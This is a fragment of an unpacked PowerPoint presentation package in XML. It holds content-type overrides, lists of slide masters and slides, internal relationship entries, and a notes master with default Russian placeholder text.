  <Override PartName="/ppt/notesSlides/_rels/notesSlide23.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide56.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide58.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide21.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide20.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide60.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide18.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide41.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide43.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide33.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide45.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide46.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide25.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide62.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide63.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide26.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide29.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide17.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide54.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide27.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide15.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide52.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide14.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide49.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide51.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide34.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide35.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide56.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide25.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26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide51.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 id="2147483672" r:id="rId14"/>
    <p:sldMasterId id="2147483674" r:id="rId15"/>
    <p:sldMasterId id="2147483676" r:id="rId16"/>
    <p:sldMasterId id="2147483678" r:id="rId17"/>
    <p:sldMasterId id="2147483680" r:id="rId18"/>
    <p:sldMasterId id="2147483682" r:id="rId19"/>
    <p:sldMasterId id="2147483684" r:id="rId20"/>
    <p:sldMasterId id="2147483686" r:id="rId21"/>
    <p:sldMasterId id="2147483688" r:id="rId22"/>
    <p:sldMasterId id="2147483690" r:id="rId23"/>
    <p:sldMasterId id="2147483692" r:id="rId24"/>
    <p:sldMasterId id="2147483694" r:id="rId25"/>
    <p:sldMasterId id="2147483696" r:id="rId26"/>
    <p:sldMasterId id="2147483698" r:id="rId27"/>
    <p:sldMasterId id="2147483700" r:id="rId28"/>
    <p:sldMasterId id="2147483702" r:id="rId29"/>
    <p:sldMasterId id="2147483704" r:id="rId30"/>
    <p:sldMasterId id="2147483706" r:id="rId31"/>
    <p:sldMasterId id="2147483708" r:id="rId32"/>
    <p:sldMasterId id="2147483710" r:id="rId33"/>
    <p:sldMasterId id="2147483712" r:id="rId34"/>
    <p:sldMasterId id="2147483714" r:id="rId35"/>
    <p:sldMasterId id="2147483716" r:id="rId36"/>
    <p:sldMasterId id="2147483718" r:id="rId37"/>
    <p:sldMasterId id="2147483720" r:id="rId38"/>
    <p:sldMasterId id="2147483722" r:id="rId39"/>
    <p:sldMasterId id="2147483724" r:id="rId40"/>
    <p:sldMasterId id="2147483726" r:id="rId41"/>
    <p:sldMasterId id="2147483728" r:id="rId42"/>
    <p:sldMasterId id="2147483730" r:id="rId43"/>
    <p:sldMasterId id="2147483732" r:id="rId44"/>
    <p:sldMasterId id="2147483734" r:id="rId45"/>
    <p:sldMasterId id="2147483736" r:id="rId46"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId47"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId48"/>
    <p:sldId id="257" r:id="rId49"/>
    <p:sldId id="258" r:id="rId50"/>
    <p:sldId id="259" r:id="rId51"/>
    <p:sldId id="260" r:id="rId52"/>
    <p:sldId id="261" r:id="rId53"/>
    <p:sldId id="262" r:id="rId54"/>
    <p:sldId id="263" r:id="rId55"/>
    <p:sldId id="264" r:id="rId56"/>
    <p:sldId id="265" r:id="rId57"/>
    <p:sldId id="266" r:id="rId58"/>
    <p:sldId id="267" r:id="rId59"/>
    <p:sldId id="268" r:id="rId60"/>
    <p:sldId id="269" r:id="rId61"/>
    <p:sldId id="270" r:id="rId62"/>
    <p:sldId id="271" r:id="rId63"/>
    <p:sldId id="272" r:id="rId64"/>
    <p:sldId id="273" r:id="rId65"/>
    <p:sldId id="274" r:id="rId66"/>
    <p:sldId id="275" r:id="rId67"/>
    <p:sldId id="276" r:id="rId68"/>
    <p:sldId id="277" r:id="rId69"/>
    <p:sldId id="278" r:id="rId70"/>
    <p:sldId id="279" r:id="rId71"/>
    <p:sldId id="280" r:id="rId72"/>
    <p:sldId id="281" r:id="rId73"/>
    <p:sldId id="282" r:id="rId74"/>
    <p:sldId id="283" r:id="rId75"/>
    <p:sldId id="284" r:id="rId76"/>
    <p:sldId id="285" r:id="rId77"/>
    <p:sldId id="286" r:id="rId78"/>
    <p:sldId id="287" r:id="rId79"/>
    <p:sldId id="288" r:id="rId80"/>
    <p:sldId id="289" r:id="rId81"/>
    <p:sldId id="290" r:id="rId82"/>
    <p:sldId id="291" r:id="rId83"/>
    <p:sldId id="292" r:id="rId84"/>
    <p:sldId id="293" r:id="rId85"/>
    <p:sldId id="294" r:id="rId86"/>
    <p:sldId id="295" r:id="rId87"/>
    <p:sldId id="296" r:id="rId88"/>
    <p:sldId id="297" r:id="rId89"/>
    <p:sldId id="298" r:id="rId90"/>
    <p:sldId id="299" r:id="rId91"/>
    <p:sldId id="300" r:id="rId92"/>
    <p:sldId id="301" r:id="rId93"/>
    <p:sldId id="302" r:id="rId94"/>
    <p:sldId id="303" r:id="rId95"/>
    <p:sldId id="304" r:id="rId96"/>
    <p:sldId id="305" r:id="rId97"/>
    <p:sldId id="306" r:id="rId98"/>
    <p:sldId id="307" r:id="rId99"/>
    <p:sldId id="308" r:id="rId100"/>
    <p:sldId id="309" r:id="rId101"/>
    <p:sldId id="310" r:id="rId102"/>
    <p:sldId id="311" r:id="rId103"/>
    <p:sldId id="312" r:id="rId104"/>
    <p:sldId id="313" r:id="rId105"/>
    <p:sldId id="314" r:id="rId106"/>
    <p:sldId id="315" r:id="rId107"/>
    <p:sldId id="316" r:id="rId108"/>
    <p:sldId id="317" r:id="rId109"/>
    <p:sldId id="318" r:id="rId110"/>
    <p:sldId id="319" r:id="rId111"/>
    <p:sldId id="320" r:id="rId112"/>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Master" Target="slideMasters/slideMaster21.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster22.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster23.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster24.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster25.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster26.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster27.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster28.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster29.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster30.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster31.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster32.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster33.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster34.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster35.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster36.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster37.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster38.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster39.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster40.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster41.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster42.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster43.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster44.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster45.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide33.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide36.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide40.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide41.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide43.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide44.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide45.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide46.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide47.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide48.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide49.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide50.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide51.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide52.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide53.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide54.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide55.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide56.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide57.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide58.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide59.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide60.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide61.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide62.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide63.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide64.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide65.xml"/><Relationship Id="rId113"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46.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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="764280"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для перемещения страницы щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271"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pPr marL="216000" indent="-216000">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Для правки формата примечаний щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3372840" cy="502560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;верхний колонтитул&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="91"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399200" y="0"/>
            <a:ext cx="3372840" cy="502560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r">
              <a:buNone/>
              <a:defRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" algn="r">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
        <p:nvSpPr>
          <p:cNvPr id="274" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="92"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9555480"/>
            <a:ext cx="3372840" cy="502560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="b">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&lt;нижний колонтитул&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="93"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399200" y="9555480"/>
            <a:ext cx="3372840" cy="502560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r">
              <a:buNone/>
              <a:defRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{DC406AAF-598B-42E1-BF53-F17F7C1B0AD0}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>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45.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide46.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide49.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide51.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide52.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
</Relationships>
</file>
